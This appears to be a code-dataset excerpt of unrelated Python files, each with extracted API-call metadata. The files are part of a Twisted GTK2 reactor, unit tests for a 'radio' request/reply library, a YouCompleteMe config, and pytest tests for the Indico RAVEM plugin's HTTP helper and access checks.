primary.remove(source) if source in other: self._sources[source] = self.input_add( source, flags, self.callback) else: self._sources.pop(source) def removeReader(self, reader): """ Stop monitoring the given L{FileDescriptor} for reading. """ self._remove(reader, self._reads, self._writes, OUTFLAGS) def removeWriter(self, writer): """ Stop monitoring the given L{FileDescriptor} for writing. 
""" self._remove(writer, self._writes, self._reads, INFLAGS) doIterationTimer = None def doIterationTimeout(self, *args): self.doIterationTimer = None return 0 # auto-remove def doIteration(self, delay): # flush some pending events, return if there was something to do # don't use the usual "while self.context.pending(): self.context.iteration()" # idiom because lots of IO (in particular test_tcp's # ProperlyCloseFilesTestCase) can keep us from ever exiting. log.msg(channel='system', event='iteration', reactor=self) if self.__pending(): self.__iteration(0) return # nothing to do, must delay if delay == 0: return # shouldn't delay, so just return self.doIterationTimer = gobject.timeout_add(int(delay * 1000), self.doIterationTimeout) # This will either wake up from IO or from a timeout. self.__iteration(1) # block # note: with the .simulate timer below, delays > 0.1 will always be # woken up by the .simulate timer if self.doIterationTimer: # if woken by IO, need to cancel the timer gobject.source_remove(self.doIterationTimer) self.doIterationTimer = None def crash(self): posixbase.PosixReactorBase.crash(self) self.__crash() def run(self, installSignalHandlers=1): self.startRunning(installSignalHandlers=installSignalHandlers) gobject.timeout_add(0, self.simulate) if self._started: self.__run() def _doReadOrWrite(self, source, condition, faildict={ error.ConnectionDone: failure.Failure(error.ConnectionDone()), error.ConnectionLost: failure.Failure(error.ConnectionLost()), }): why = None inRead = False if condition & POLL_DISCONNECTED and not (condition & gobject.IO_IN): if source in self._reads: why = main.CONNECTION_DONE inRead = True else: why = main.CONNECTION_LOST else: try: if condition & gobject.IO_IN: why = source.doRead() inRead = True if not why and condition & gobject.IO_OUT: # if doRead caused connectionLost, don't call doWrite # if doRead is doWrite, don't call it again. if not source.disconnected: why = source.doWrite() except: why = sys.exc_info()[1] log.msg('Error In %s' % source) log.deferr() if why: self._disconnectSelectable(source, why, inRead) def callback(self, source, condition): log.callWithLogger(source, self._doReadOrWrite, source, condition) self.simulate() # fire Twisted timers return 1 # 1=don't auto-remove the source def simulate(self): """ Run simulation loops and reschedule callbacks. """ if self._simtag is not None: gobject.source_remove(self._simtag) self.runUntilCurrent() timeout = min(self.timeout(), 0.1) if timeout is None: timeout = 0.1 # grumble self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate) class PortableGtkReactor(selectreactor.SelectReactor): """ Reactor that works on Windows. Sockets aren't supported by GTK+'s input_add on Win32. """ _simtag = None def crash(self): selectreactor.SelectReactor.crash(self) import gtk # mainquit is deprecated in newer versions if gtk.main_level(): if hasattr(gtk, 'main_quit'): gtk.main_quit() else: gtk.mainquit() def run(self, installSignalHandlers=1): import gtk self.startRunning(installSignalHandlers=installSignalHandlers) gobject.timeout_add(0, self.simulate) # mainloop is deprecated in newer versions if hasattr(gtk, 'main'): gtk.main() else: gtk.mainloop() def simulate(self): """ Run simulation loops and reschedule callbacks. 
""" if self._simtag is not None: gobject.source_remove(self._simtag) self.iterate() timeout = min(self.timeout(), 0.1) if timeout is None: timeout = 0.1 # grumble self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate) def install(useGtk=True): """ Configure the twisted mainloop to be run inside the gtk mainloop. @param useGtk: should glib rather than GTK+ event loop be used (this will be slightly faster but does not support GUI). """ reactor = Gtk2Reactor(useGtk) from twisted.internet.main import installReactor installReactor(reactor) return reactor def portableInstall(useGtk=True): """ Configure the twisted mainloop to be run inside the gtk mainloop. """ reactor = PortableGtkReactor() from twisted.internet.main import installReactor installReactor(reactor) return reactor if runtime.platform.getType() != 'posix': install = portableInstall __all__ = ['install']
[ "twisted.internet.posixbase.PosixReactorBase.__init__", "twisted.internet.process.reapAllProcesses", "zope.interface.implements", "signal.siginterrupt", "sys.exc_info", "twisted.python.log.deferr", "twisted.python.runtime.platform.getType", "twisted.internet.error.ConnectionDone", "twisted.internet.posixbase.PosixReactorBase.crash", "twisted.python.compat.set", "gtk.main_level", "gtk.mainquit", "gtk.main_quit", "gobject.threads_init", "twisted.python.log.msg", "pygtk.require", "twisted.python.log.callWithLogger", "gobject.main_context_default", "gobject.MainLoop", "gtk.main", "twisted.internet.main.installReactor", "twisted.internet.error.ConnectionLost", "twisted.internet.base._SignalReactorMixin._handleSignals", "gobject.io_add_watch", "twisted.internet.selectreactor.SelectReactor.crash", "gobject.timeout_add", "gobject.source_remove", "gtk.mainloop" ]
[((1126, 1148), 'gobject.threads_init', 'gobject.threads_init', ([], {}), '()\n', (1146, 1148), False, 'import gobject\n'), ((2087, 2103), 'gtk.main_level', 'gtk.main_level', ([], {}), '()\n', (2101, 2103), False, 'import gtk\n'), ((2597, 2622), 'zope.interface.implements', 'implements', (['IReactorFDSet'], {}), '(IReactorFDSet)\n', (2607, 2622), False, 'from zope.interface import implements\n'), ((12990, 13013), 'twisted.internet.main.installReactor', 'installReactor', (['reactor'], {}), '(reactor)\n', (13004, 13013), False, 'from twisted.internet.main import installReactor\n'), ((13248, 13271), 'twisted.internet.main.installReactor', 'installReactor', (['reactor'], {}), '(reactor)\n', (13262, 13271), False, 'from twisted.internet.main import installReactor\n'), ((13297, 13323), 'twisted.python.runtime.platform.getType', 'runtime.platform.getType', ([], {}), '()\n', (13321, 13323), False, 'from twisted.python import log, runtime, failure\n'), ((795, 815), 'pygtk.require', 'pygtk.require', (['"""2.0"""'], {}), "('2.0')\n", (808, 815), False, 'import pygtk\n'), ((2113, 2128), 'gtk.main_quit', 'gtk.main_quit', ([], {}), '()\n', (2126, 2128), False, 'import gtk\n'), ((2711, 2716), 'twisted.python.compat.set', 'set', ([], {}), '()\n', (2714, 2716), False, 'from twisted.python.compat import set\n'), ((2740, 2745), 'twisted.python.compat.set', 'set', ([], {}), '()\n', (2743, 2745), False, 'from twisted.python.compat import set\n'), ((2781, 2822), 'twisted.internet.posixbase.PosixReactorBase.__init__', 'posixbase.PosixReactorBase.__init__', (['self'], {}), '(self)\n', (2816, 2822), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((7418, 7462), 'gobject.source_remove', 'gobject.source_remove', (['self._sources[source]'], {}), '(self._sources[source])\n', (7439, 7462), False, 'import gobject\n'), ((8531, 8589), 'twisted.python.log.msg', 'log.msg', ([], {'channel': '"""system"""', 'event': '"""iteration"""', 'reactor': 'self'}), "(channel='system', event='iteration', reactor=self)\n", (8538, 8589), False, 'from twisted.python import log, runtime, failure\n'), ((9360, 9398), 'twisted.internet.posixbase.PosixReactorBase.crash', 'posixbase.PosixReactorBase.crash', (['self'], {}), '(self)\n', (9392, 9398), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((9547, 9584), 'gobject.timeout_add', 'gobject.timeout_add', (['(0)', 'self.simulate'], {}), '(0, self.simulate)\n', (9566, 9584), False, 'import gobject\n'), ((10856, 10922), 'twisted.python.log.callWithLogger', 'log.callWithLogger', (['source', 'self._doReadOrWrite', 'source', 'condition'], {}), '(source, self._doReadOrWrite, source, condition)\n', (10874, 10922), False, 'from twisted.python import log, runtime, failure\n'), ((11652, 11691), 'twisted.internet.selectreactor.SelectReactor.crash', 'selectreactor.SelectReactor.crash', (['self'], {}), '(self)\n', (11685, 11691), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((11773, 11789), 'gtk.main_level', 'gtk.main_level', ([], {}), '()\n', (11787, 11789), False, 'import gtk\n'), ((12058, 12095), 'gobject.timeout_add', 'gobject.timeout_add', (['(0)', 'self.simulate'], {}), '(0, self.simulate)\n', (12077, 12095), False, 'import gobject\n'), ((3083, 3113), 'gobject.main_context_default', 'gobject.main_context_default', ([], {}), '()\n', (3111, 3113), False, 'import gobject\n'), ((3242, 3260), 'gobject.MainLoop', 'gobject.MainLoop', ([], {}), '()\n', (3258, 3260), False, 'import gobject\n'), 
((4182, 4227), 'twisted.internet.base._SignalReactorMixin._handleSignals', 'base._SignalReactorMixin._handleSignals', (['self'], {}), '(self)\n', (4221, 4227), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((4587, 4606), 'twisted.internet.process.reapAllProcesses', '_reapAllProcesses', ([], {}), '()\n', (4604, 4606), True, 'from twisted.internet.process import reapAllProcesses as _reapAllProcesses\n'), ((5463, 5512), 'gobject.io_add_watch', 'gobject.io_add_watch', (['source', 'condition', 'callback'], {}), '(source, condition, callback)\n', (5483, 5512), False, 'import gobject\n'), ((5977, 6021), 'gobject.source_remove', 'gobject.source_remove', (['self._sources[source]'], {}), '(self._sources[source])\n', (5998, 6021), False, 'import gobject\n'), ((9243, 9287), 'gobject.source_remove', 'gobject.source_remove', (['self.doIterationTimer'], {}), '(self.doIterationTimer)\n', (9264, 9287), False, 'import gobject\n'), ((11173, 11208), 'gobject.source_remove', 'gobject.source_remove', (['self._simtag'], {}), '(self._simtag)\n', (11194, 11208), False, 'import gobject\n'), ((12192, 12202), 'gtk.main', 'gtk.main', ([], {}), '()\n', (12200, 12202), False, 'import gtk\n'), ((12229, 12243), 'gtk.mainloop', 'gtk.mainloop', ([], {}), '()\n', (12241, 12243), False, 'import gtk\n'), ((12398, 12433), 'gobject.source_remove', 'gobject.source_remove', (['self._simtag'], {}), '(self._simtag)\n', (12419, 12433), False, 'import gobject\n'), ((4403, 4445), 'signal.siginterrupt', 'signal.siginterrupt', (['signal.SIGCHLD', '(False)'], {}), '(signal.SIGCHLD, False)\n', (4422, 4445), False, 'import sys, signal\n'), ((9743, 9765), 'twisted.internet.error.ConnectionDone', 'error.ConnectionDone', ([], {}), '()\n', (9763, 9765), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((9814, 9836), 'twisted.internet.error.ConnectionLost', 'error.ConnectionLost', ([], {}), '()\n', (9834, 9836), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((11849, 11864), 'gtk.main_quit', 'gtk.main_quit', ([], {}), '()\n', (11862, 11864), False, 'import gtk\n'), ((11899, 11913), 'gtk.mainquit', 'gtk.mainquit', ([], {}), '()\n', (11911, 11913), False, 'import gtk\n'), ((10665, 10696), 'twisted.python.log.msg', 'log.msg', (["('Error In %s' % source)"], {}), "('Error In %s' % source)\n", (10672, 10696), False, 'from twisted.python import log, runtime, failure\n'), ((10713, 10725), 'twisted.python.log.deferr', 'log.deferr', ([], {}), '()\n', (10723, 10725), False, 'from twisted.python import log, runtime, failure\n'), ((10631, 10645), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (10643, 10645), False, 'import sys, signal\n')]
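The reactor module above exposes install() / portableInstall() for hooking Twisted into the GTK main loop. A minimal usage sketch follows; it assumes the module is importable as twisted.internet.gtk2reactor (its location in upstream Twisted) — adjust the import if the file lives elsewhere.

# Usage sketch: install the GTK2 reactor *before* importing the reactor,
# then drive Twisted timers from inside the GTK/GObject main loop.
from twisted.internet import gtk2reactor   # assumed module path
gtk2reactor.install()                      # must run before the next import

from twisted.internet import reactor

def say_hello():
    print('hello from a Twisted timer running inside the GTK main loop')

reactor.callLater(1.0, say_hello)
reactor.run()   # starts the GTK/GObject main loop via Gtk2Reactor.run()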
# -*- coding: utf-8 -*-
from unittest import TestCase, TestLoader

from radio import (Radio, ListenerNotFound, ReplyHandlerAlreadyBound,
                   HandlerAlreadyBound)


def init_radio(f):
    def wrap(self, *args):
        self.radio = Radio()
        return f(self, *args)
    return wrap


class TestRadioRequestReplyMethods(TestCase):

    @init_radio
    def test_request_reply_stop_replying(self):
        ''' "request", "reply" and "stopReplying" methods work correctly. '''
        def foo_handler():
            return 'foo'

        def bar_handler(my_arg=222):
            return my_arg

        self.radio.reply('foo', foo_handler)
        self.radio.reply('bar', bar_handler)

        self.assertEqual(self.radio.request('foo'), 'foo')
        self.assertEqual(self.radio.request('bar'), 222)
        self.assertEqual(self.radio.request('bar', 333), 333)
        self.assertEqual(self.radio.request('bar', my_arg=444), 444)

        self.radio.stopReplying('foo')
        self.radio.stopReplying('bar')

        with self.assertRaises(ListenerNotFound):
            self.radio.request('foo')
        with self.assertRaises(ListenerNotFound):
            self.radio.request('bar')

    @init_radio
    def test_kwargs(self):
        ''' Keyword arguments work correctly. '''
        foo_list = []

        def foo_handler(foo, bar):
            return (foo, bar)

        self.radio.reply('foo', foo_handler)
        self.assertEqual(self.radio.request('foo', bar=5, foo=10), (10, 5))

    @init_radio
    def test_on_already_bound(self):
        ''' "reply" fails when trying to bind a handler that is already bound. '''
        def foo_handler():
            pass

        self.radio.reply('foo', foo_handler)
        self.radio.reply('bar', foo_handler)

        # General exception
        with self.assertRaises(HandlerAlreadyBound):
            self.radio.reply('foo', foo_handler)

        # Child exception
        with self.assertRaises(ReplyHandlerAlreadyBound):
            self.radio.reply('foo', foo_handler)

    @init_radio
    def test_off_handler_that_was_not_bounded(self):
        ''' "stopReplying" fails when trying to unbind a handler that was not bound. '''
        def foo_handler():
            pass

        with self.assertRaises(ListenerNotFound):
            self.radio.stopReplying('foo', foo_handler)

    @init_radio
    def test_off_soft_mode(self):
        ''' "stopReplying" will not fail if the soft argument is set to True. '''
        def foo_handler():
            pass

        self.radio.stopReplying('foo', foo_handler, soft=True)
        self.radio.stopReplying('foo', foo_handler, soft=True)

    @init_radio
    def test_trigger_fail_on_incorrect_arguments(self):
        ''' "request" fails when the arguments for the handler are incorrect. '''
        def foo_handler(required_arg):
            pass

        self.radio.reply('foo', foo_handler)
        with self.assertRaises(TypeError):
            self.radio.request('foo')


suite = TestLoader().loadTestsFromTestCase(TestRadioRequestReplyMethods)
[ "radio.Radio", "unittest.TestLoader" ]
[((248, 255), 'radio.Radio', 'Radio', ([], {}), '()\n', (253, 255), False, 'from radio import Radio, ListenerNotFound, ReplyHandlerAlreadyBound, HandlerAlreadyBound\n'), ((3016, 3028), 'unittest.TestLoader', 'TestLoader', ([], {}), '()\n', (3026, 3028), False, 'from unittest import TestCase, TestLoader\n')]
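The tests above exercise a request/reply API on Radio. A hedged sketch of how that API is used directly is shown below; only the methods that actually appear in the tests (reply, request, stopReplying) are used, and the 'sum' event name is illustrative.

# Direct usage of the request/reply API exercised by the tests above.
from radio import Radio, ListenerNotFound

radio = Radio()

def sum_handler(a, b):
    return a + b

radio.reply('sum', sum_handler)           # bind a reply handler
print(radio.request('sum', 2, 3))          # -> 5
print(radio.request('sum', a=1, b=9))      # -> 10 (kwargs are forwarded)

radio.stopReplying('sum')
try:
    radio.request('sum')
except ListenerNotFound:
    print('no handler is bound for "sum" any more')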
import os
import sys

DIR_OF_THIS_SCRIPT = os.path.abspath( os.path.dirname( __file__ ) )


def Settings( **kwargs ):
  return {
    'interpreter_path': sys.executable,
    'sys_path': [ os.path.join( DIR_OF_THIS_SCRIPT, 'third_party' ) ]
  }
[ "os.path.dirname", "os.path.join" ]
[((60, 85), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (75, 85), False, 'import os\n'), ((187, 234), 'os.path.join', 'os.path.join', (['DIR_OF_THIS_SCRIPT', '"""third_party"""'], {}), "(DIR_OF_THIS_SCRIPT, 'third_party')\n", (199, 234), False, 'import os\n')]
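Settings() above is the hook that ycmd's Python completer calls to discover the interpreter and extra import paths. A quick local sanity check is sketched below; ycmd normally imports the conf file itself, and the filename '.ycm_extra_conf.py' is only the conventional one, assumed here.

# Sanity-check sketch: inspect what ycmd would receive from Settings().
import pprint
import runpy

conf = runpy.run_path('.ycm_extra_conf.py')        # path is an assumption
pprint.pprint(conf['Settings'](language='python'))
# expected shape:
# {'interpreter_path': '/path/to/python', 'sys_path': ['.../third_party']}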
# This file is part of the CERN Indico plugins. # Copyright (C) 2014 - 2022 CERN # # The CERN Indico plugins are free software; you can redistribute # them and/or modify them under the terms of the MIT License; see # the LICENSE file for more details. from unittest.mock import MagicMock import pytest from requests.exceptions import HTTPError, Timeout from indico.testing.util import extract_logs from indico_ravem.plugin import RavemPlugin from indico_ravem.util import has_access, ravem_api_call @pytest.mark.usefixtures('db') @pytest.mark.parametrize('method', ('get', 'post')) def test_correct_http_method(mocker, method): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response ravem_api_call('test_endpoint', method=method, param1='test1', param2='test2') assert request.call_count == 1 assert request.call_args[0][0] == method @pytest.mark.usefixtures('db') def test_correct_auth_method(mocker): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response token = 'foo' RavemPlugin.settings.set('access_token', token) ravem_api_call('test_endpoint', param1='test1', param2='test2') assert request.call_count == 1 assert 'Authorization' in request.call_args[1]['headers'] assert request.call_args[1]['headers']['Authorization'] == 'Bearer %s' % token @pytest.mark.usefixtures('db') def test_accepts_json(mocker): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response ravem_api_call('test_endpoint', param1='test1', param2='test2') assert request.call_count == 1 assert request.call_args[1]['headers']['Accept'] == 'application/json' @pytest.mark.usefixtures('db') @pytest.mark.parametrize(('root_endpoint', 'endpoint', 'expected_url'), ( ('https://ravem.test/', 'final_endpoint', 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/', 'final_endpoint', 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/', 'final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test', './final_endpoint', 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/', './final_endpoint', 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/', './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test', 'sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/', 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), ('https://ravem.test/api/v2/', 'sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test', './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/', './sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), ('https://ravem.test/api/v2/', './sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/', '', 'https://ravem.test/'), ('https://ravem.test/api/', '', 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '', 'https://ravem.test/api/v2/'), )) def test_correct_api_endpoint(mocker, root_endpoint, endpoint, expected_url): request = mocker.patch('indico_ravem.util.requests.request') response = 
MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response RavemPlugin.settings.set('api_endpoint', root_endpoint) ravem_api_call(endpoint, param1='test1', param2='test2') assert request.call_count == 1 assert request.call_args[0][1] == expected_url @pytest.mark.usefixtures('db') @pytest.mark.parametrize('params', ( {}, {'p1': '1stparam'}, {'p1': '1stparam', 'p2': '2ndparam'} )) def test_params_generated(mocker, params): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response ravem_api_call('test_endpoint', params=params) assert request.call_count == 1 assert request.call_args[1]['params'] == params @pytest.mark.usefixtures('db') def test_raises_timeout(mocker): request = mocker.patch('indico_ravem.util.requests.request') request.side_effect = Timeout('Timeout test error message', request=request) with pytest.raises(Timeout) as excinfo: ravem_api_call('test_endpoint') assert str(excinfo.value) == "Timeout while contacting the room." assert request.call_count == 1 @pytest.mark.usefixtures('db') @pytest.mark.parametrize(('method', 'params'), ( ('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2': '2ndparam'}) )) def test_unexpected_exception_is_logged(mocker, caplog, method, params): request = mocker.patch('indico_ravem.util.requests.request') request.side_effect = IndexError('this is unexpected') with pytest.raises(IndexError) as excinfo: ravem_api_call('test_endpoint', method=method, **params) assert str(excinfo.value) == 'this is unexpected' log = extract_logs(caplog, one=True, name='indico.plugin.ravem') assert log.message == "failed call: {} {} with {}: {}".format(method.upper(), 'test_endpoint', params, 'this is unexpected') assert request.call_count == 1 @pytest.mark.usefixtures('db') @pytest.mark.parametrize(('method', 'params'), ( ('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2': '2ndparam'}) )) def test_http_error_is_logged(mocker, caplog, method, params): request = mocker.patch('indico_ravem.util.requests.request') request.method = method.upper() request.url = RavemPlugin.settings.get('api_endpoint') + 'test_endpoint' response = MagicMock() response.raise_for_status.side_effect = HTTPError('Well this is embarrassing') response.request = request response.url = response.request.url request.return_value = response with pytest.raises(HTTPError) as excinfo: ravem_api_call('test_endpoint', method=method, **params) assert str(excinfo.value) == 'Well this is embarrassing' log = extract_logs(caplog, one=True, name='indico.plugin.ravem') assert log.message == '{} {} failed with {}'.format( method.upper(), RavemPlugin.settings.get('api_endpoint') + 'test_endpoint', 'Well this is embarrassing') assert request.call_count == 1 @pytest.mark.usefixtures('db') def test_unlinked_event_vc_room_has_no_access(): event_vc_room = MagicMock() event_vc_room.link_object = None assert not has_access(event_vc_room) @pytest.mark.usefixtures('db', 'request_context') def test_unlinked_room_has_no_access(mocker): session = mocker.patch('indico_ravem.util.session') session.user = '<NAME>' event_vc_room = MagicMock() event_vc_room.link_object.room = None 
assert not has_access(event_vc_room) @pytest.mark.usefixtures('db', 'request_context') def test_check_if_current_user_is_room_owner(mocker): session = mocker.patch('indico_ravem.util.session') session.user = '<NAME>' request = mocker.patch('indico_ravem.util.request') request.remote_addr = '192.168.127.12' retrieve_principal = mocker.patch('indico_ravem.util._retrieve_principal') retrieve_principal.side_effect = lambda x: session.user event_vc_room = MagicMock() event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True) event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr event_vc_room.vc_room.data.get.return_value = 'User:123' event_vc_room.event.can_manage.return_value = False assert has_access(event_vc_room) @pytest.mark.usefixtures('db', 'request_context') def test_check_if_current_user_can_modify(mocker): request = mocker.patch('indico_ravem.util.request') request.remote_addr = '192.168.127.12' session = mocker.patch('indico_ravem.util.session') session.user = '<NAME>' mocker.patch('indico_ravem.util._retrieve_principal') event_vc_room = MagicMock() event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True) event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr event_vc_room.event.can_manage.return_value = True assert has_access(event_vc_room) event_vc_room.event.can_manage.assert_called_once_with(session.user)
[ "unittest.mock.MagicMock", "indico.testing.util.extract_logs", "indico_ravem.plugin.RavemPlugin.settings.get", "indico_ravem.util.has_access", "pytest.mark.parametrize", "pytest.raises", "pytest.mark.usefixtures", "requests.exceptions.HTTPError", "indico_ravem.plugin.RavemPlugin.settings.set", "indico_ravem.util.ravem_api_call", "requests.exceptions.Timeout" ]
[((506, 535), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (529, 535), False, 'import pytest\n'), ((537, 587), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""method"""', "('get', 'post')"], {}), "('method', ('get', 'post'))\n", (560, 587), False, 'import pytest\n'), ((1033, 1062), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (1056, 1062), False, 'import pytest\n'), ((1655, 1684), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (1678, 1684), False, 'import pytest\n'), ((2130, 2159), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (2153, 2159), False, 'import pytest\n'), ((2161, 3611), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('root_endpoint', 'endpoint', 'expected_url')", "(('https://ravem.test/', 'final_endpoint',\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'final_endpoint',\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\n 'https://ravem.test/api/', './final_endpoint',\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\n 'https://ravem.test', 'sub/final_endpoint',\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\n 'https://ravem.test/api/', './sub/final_endpoint',\n 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\n 'https://ravem.test/api/v2/'))"], {}), "(('root_endpoint', 'endpoint', 'expected_url'), ((\n 'https://ravem.test/', 'final_endpoint',\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'final_endpoint',\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\n 'https://ravem.test/api/', './final_endpoint',\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\n 'https://ravem.test', 'sub/final_endpoint',\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\n 'https://ravem.test/api/', './sub/final_endpoint',\n 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', 
'',\n 'https://ravem.test/api/v2/')))\n", (2184, 3611), False, 'import pytest\n'), ((4101, 4130), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (4124, 4130), False, 'import pytest\n'), ((4132, 4233), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""params"""', "({}, {'p1': '1stparam'}, {'p1': '1stparam', 'p2': '2ndparam'})"], {}), "('params', ({}, {'p1': '1stparam'}, {'p1':\n '1stparam', 'p2': '2ndparam'}))\n", (4155, 4233), False, 'import pytest\n'), ((4661, 4690), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (4684, 4690), False, 'import pytest\n'), ((5064, 5093), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (5087, 5093), False, 'import pytest\n'), ((5095, 5336), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('method', 'params')", "(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\n 'p1': '1stparam', 'p2': '2ndparam'}))"], {}), "(('method', 'params'), (('get', {}), ('post', {}), (\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\n '2ndparam'})))\n", (5118, 5336), False, 'import pytest\n'), ((6017, 6046), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (6040, 6046), False, 'import pytest\n'), ((6048, 6289), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('method', 'params')", "(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\n 'p1': '1stparam', 'p2': '2ndparam'}))"], {}), "(('method', 'params'), (('get', {}), ('post', {}), (\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\n '2ndparam'})))\n", (6071, 6289), False, 'import pytest\n'), ((7213, 7242), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""'], {}), "('db')\n", (7236, 7242), False, 'import pytest\n'), ((7406, 7454), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""', '"""request_context"""'], {}), "('db', 'request_context')\n", (7429, 7454), False, 'import pytest\n'), ((7705, 7753), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""', '"""request_context"""'], {}), "('db', 'request_context')\n", (7728, 7753), False, 'import pytest\n'), ((8491, 8539), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""db"""', '"""request_context"""'], {}), "('db', 'request_context')\n", (8514, 8539), False, 'import pytest\n'), ((714, 725), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (723, 725), False, 'from unittest.mock import MagicMock\n'), ((870, 948), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'method': 'method', 'param1': 